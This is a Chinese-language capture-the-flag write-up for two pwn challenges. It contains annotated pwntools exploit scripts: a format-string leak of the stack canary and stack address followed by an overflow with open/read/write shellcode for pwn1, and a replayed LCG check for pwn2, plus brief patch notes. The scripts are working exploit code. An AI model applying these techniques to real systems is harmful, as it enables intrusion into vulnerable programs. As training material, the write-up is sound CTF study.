pwn1
- break
很简单,栈可执行。
先格式化字符串泄露出栈地址和canary,然后稍稍布置一下打orw就行
沙盒和没有一样
from pwn import *

# Solve script for "pwn1" (see the write-up above): a format-string read in
# the "get name" path leaks the stack canary and a stack address, then an
# open/read/write shellcode is placed through the oversized "set name" read.
# NOTE(review): the fix described below (read size 0x80 -> 0x60) removes the
# overflow only; the '%N$p' leak used here is a separate format-string bug.
context(arch='amd64', os='linux')

if __name__ == '__main__':
    # io = remote('192.47.1.39', 80)
    io = remote('192.168.142.137', 1234)

    # Menu 1 stores the name, menu 2 prints it back through a format string,
    # so '%17$p' echoes the 17th argument slot -- the canary, per the write-up.
    io.recvuntil(b'2: get name')
    io.sendline(b'1')
    io.recvuntil(b'->set name')
    io.sendline(b'%17$p')
    io.recvuntil(b'2: get name')
    io.sendline(b'2')
    io.recvuntil(b'->get name\n')
    canary = int(io.recvuntil(b'\n')[:-1], 16)
    print(hex(canary))

    # openat(0, '/flag') -> read(fd, rsp, 32) -> write(1, rsp, 32).
    # The dirfd 0 is ignored because the path is absolute.
    shellcode = shellcraft.openat(0, '/flag')
    shellcode += shellcraft.read('rax', 'rsp', 32)
    shellcode += shellcraft.write(1, 'rsp', 32)
    shellcode = asm(shellcode)
    payload = shellcode
    # Left-pad with NOPs to 0x60 - 3*8 = 72 bytes so the shellcode sits at
    # the end of the buffer; the three 8-byte slots that follow are the
    # canary, a filler qword (presumably the saved rbp) and the return address.
    payload = payload.rjust(0x60 - 8 * 3, b'\x90')
    payload += p64(canary)

    # Second leak: '%18$p' followed by a literal 'k' sentinel, so recvuntil(b'k')
    # captures exactly the hex value. The buffer is taken to start 0x60 below
    # the leaked pointer (the two debugging notes near the end show the pair).
    io.recvuntil(b'2: get name')
    io.sendline(b'1')
    io.recvuntil(b'->set name')
    io.sendline(b'%18$pk')
    io.recvuntil(b'2: get name')
    io.sendline(b'2')
    io.recvuntil(b'->get name\n')
    target_stack = int(io.recvuntil(b'k')[:-1], 16) - 0x60
    print(hex(target_stack))
    payload += p64(0xdeedbeef)
    payload += p64(target_stack)

    # Deliver the 0x60-byte payload via "set name"; menu 3 is the option the
    # write-up uses afterwards (presumably the one that returns from the
    # vulnerable frame -- not verifiable from this script alone).
    io.recvuntil(b'2: get name')
    io.sendline(b'1')
    io.recvuntil(b'->set name')
    io.sendline(payload)
    io.recvuntil(b'2: get name')
    io.sendline(b'3')
    # Debugging notes: observed target ("tar") vs leaked ("get") addresses,
    # 0x60 apart, matching the adjustment above.
    # 7FFD0D2025F0 tar
    # 7FFD0D202650 get
    print(payload)
    print(len(payload))
    io.interactive()
    pass
# context(log_level='debug', arch='amd64', os='linux')
# if __name__ == '__main__':
# io = remote('202.0.5.74', 8888)
# shellcode = shellcraft.open('/flag')
# shellcode += shellcraft.read('rax', 'rsp', 100)
# shellcode += shellcraft.write(1, 'rsp', 100)
# shellcode = asm(shellcode)
# io.sendlineafter(b'ode?\n\n', shellcode)
# io.interactive()
- fix
关键点是栈溢出,把read大小从0x80改成0x60即可
pwn2
- break
简单题,难在没有符号表。
只需要看懂逻辑即可。猜flag头稍稍需要一点点运气
from pwn import *

# Solve script for "pwn2" (see the write-up above): four values are read back
# from the service through menu option 2, then each is re-sent to option 3
# together with a locally recomputed LCG state, and option 6 is selected.
context(arch='amd64', os='linux')

if __name__ == '__main__':
    # io = remote('192.47.1.50', 80)
    io = remote('192.168.142.137', 9999)

    # Option 2 prints one decimal number after a ':'; keep each one as bytes
    # (normalised through int() -> str()) so it can be re-sent verbatim below.
    fuck = []
    for i in range(4):
        io.recvuntil(b'check flag\n')
        io.sendline(b'2')
        io.recvuntil(b':')
        fuck.append(str(int(io.recvuntil(b'\n')[:-1], 10)).encode())
    print(fuck)

    # Initial LCG state: 0x5139397b67616c66 is the guessed flag prefix
    # b'flag{99Q' read as a little-endian 64-bit integer (the "guess the flag
    # header" step mentioned in the write-up).
    fuck_flag = 0x5139397b67616c66
    for i in range(4):
        # One 64-bit LCG step (multiplier 0x5851F42D4C957F2D, increment 12345),
        # truncated to 63 bits. This is assumed to mirror the binary's own
        # check; the binary is not shown here -- verify against it.
        fuck_flag = (0x5851F42D4C957F2D * fuck_flag + 12345) & 0x7FFFFFFFFFFFFFFF
        # Option 3 takes "<value read back> <lcg state>" on one line.
        io.recvuntil(b'check flag\n')
        io.sendline(b'3')
        io.recvuntil(b'\n')
        io.sendline(fuck[i] + b' ' + str(fuck_flag).encode())

    # Option 6 is what the write-up selects after the four submissions.
    io.recvuntil(b'check flag\n')
    io.sendline(b'6')
    io.interactive()
- fix
把printf吐flag的%s改成ss即可
小结
pwn题目难度整体偏低,而且只有两道题,希望下次可以多一点。